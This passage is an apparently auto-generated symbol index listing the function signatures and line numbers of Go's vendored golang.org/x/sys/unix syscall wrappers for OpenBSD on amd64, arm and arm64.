Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_amd64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_arm.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1591) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1612) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1633) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1659) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1685) | func Rename(from string, to string) (err error) { function Renameat (line 1709) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1733) | func Revoke(path string) (err error) { function Rmdir (line 1752) | func Rmdir(path string) (err error) { function Seek (line 1771) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1786) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setegid (line 1801) | func Setegid(egid int) (err error) { function Seteuid (line 1815) | func Seteuid(euid int) (err error) { function Setgid (line 1829) | func Setgid(gid int) (err error) { function Setlogin (line 1843) | func Setlogin(name string) (err error) { function Setpgid (line 1862) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 1876) | func Setpriority(which int, who int, prio int) (err error) { function Setregid (line 1890) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 1904) | func Setreuid(ruid int, euid int) (err error) { function Setresgid (line 1918) | func Setresgid(rgid int, egid int, sgid int) (err error) { function Setresuid (line 1932) | func Setresuid(ruid int, euid int, suid int) (err error) { function Setrtable (line 1946) | func Setrtable(rtable int) (err error) { function Setsid (line 1960) | func Setsid() (pid int, err error) { function Settimeofday (line 1975) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 1989) | func Setuid(uid int) (err error) { function Stat (line 2003) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2022) | func Statfs(path string, stat *Statfs_t) (err error) { function Symlink (line 2041) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2065) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2089) | func Sync() (err error) { function Truncate (line 2103) | func Truncate(path string, length int64) (err error) { function Umask (line 2122) | func Umask(newmask int) (oldmask int) { function Unlink (line 2134) | func Unlink(path string) (err error) { function Unlinkat (line 2153) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2172) | func Unmount(path string, flags int) (err error) { function write (line 2191) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2212) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2227) | func munmap(addr uintptr, length uintptr) (err error) { function getfsstat (line 2241) | func getfsstat(stat *Statfs_t, bufsize uintptr, flags int) (n int, err e... function utimensat (line 2256) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function pledge (line 2275) | func pledge(promises *byte, execpromises *byte) (err error) { function unveil (line 2289) | func unveil(path *byte, flags *byte) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_openbsd_arm64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function pipe2 (line 465) | func pipe2(p *[2]_C_int, flags int) (err error) { function Getdents (line 479) | func Getdents(fd int, buf []byte) (n int, err error) { function Getcwd (line 500) | func Getcwd(buf []byte) (n int, err error) { function getresuid (line 521) | func getresuid(ruid *_C_int, euid *_C_int, suid *_C_int) { function getresgid (line 532) | func getresgid(rgid *_C_int, egid *_C_int, sgid *_C_int) { function ioctl (line 543) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 557) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 567) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function fcntl (line 587) | func fcntl(fd int, cmd int, arg int) (n int, err error) { function fcntlPtr (line 602) | func fcntlPtr(fd int, cmd int, arg unsafe.Pointer) (n int, err error) { function ppoll (line 613) | func ppoll(fds *PollFd, nfds int, timeout *Timespec, sigmask *Sigset_t) ... function Access (line 628) | func Access(path string, mode uint32) (err error) { function Adjtime (line 647) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 661) | func Chdir(path string) (err error) { function Chflags (line 680) | func Chflags(path string, flags int) (err error) { function Chmod (line 699) | func Chmod(path string, mode uint32) (err error) { function Chown (line 718) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 737) | func Chroot(path string) (err error) { function ClockGettime (line 756) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 770) | func Close(fd int) (err error) { function Dup (line 784) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 799) | func Dup2(from int, to int) (err error) { function Dup3 (line 813) | func Dup3(from int, to int, flags int) (err error) { function Exit (line 827) | func Exit(code int) { function Faccessat (line 838) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 857) | func Fchdir(fd int) (err error) { function Fchflags (line 871) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 885) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 899) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 918) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 932) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Flock (line 951) | func Flock(fd int, how int) (err error) { function Fpathconf (line 965) | func Fpathconf(fd int, name int) (val int, err error) { function Fstat (line 980) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 994) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 1013) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function Fsync (line 1027) | func Fsync(fd int) (err error) { function Ftruncate (line 1041) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 1055) | func Getegid() (egid int) { function Geteuid (line 1067) | func Geteuid() (uid int) { function Getgid (line 1079) | func Getgid() (gid int) { function Getpgid (line 1091) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1106) | func Getpgrp() (pgrp int) { function Getpid (line 1118) | func Getpid() (pid int) { function Getppid (line 1130) | func Getppid() (ppid int) { function Getpriority (line 1142) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1157) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrtable (line 1171) | func Getrtable() (rtable int, err error) { function Getrusage (line 1186) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1200) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1215) | func Gettimeofday(tv *Timeval) (err error) { function Getuid (line 1229) | func Getuid() (uid int) { function Issetugid (line 1241) | func Issetugid() (tainted bool) { function Kill (line 1253) | func Kill(pid int, signum syscall.Signal) (err error) { function Kqueue (line 1267) | func Kqueue() (fd int, err error) { function Lchown (line 1282) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1301) | func Link(path string, link string) (err error) { function Linkat (line 1325) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1349) | func Listen(s int, backlog int) (err error) { function Lstat (line 1363) | func Lstat(path string, stat *Stat_t) (err error) { function Mkdir (line 1382) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1401) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1420) | func Mkfifo(path string, mode uint32) (err error) { function Mkfifoat (line 1439) | func Mkfifoat(dirfd int, path string, mode uint32) (err error) { function Mknod (line 1458) | func Mknod(path string, mode uint32, dev int) (err error) { function Mknodat (line 1477) | func Mknodat(dirfd int, path string, mode uint32, dev int) (err error) { function Nanosleep (line 1496) | func Nanosleep(time *Timespec, leftover *Timespec) (err error) { function Open (line 1510) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1530) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1550) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1570) | func pread(fd int, p []byte, offset int64) (n int, err error) { function 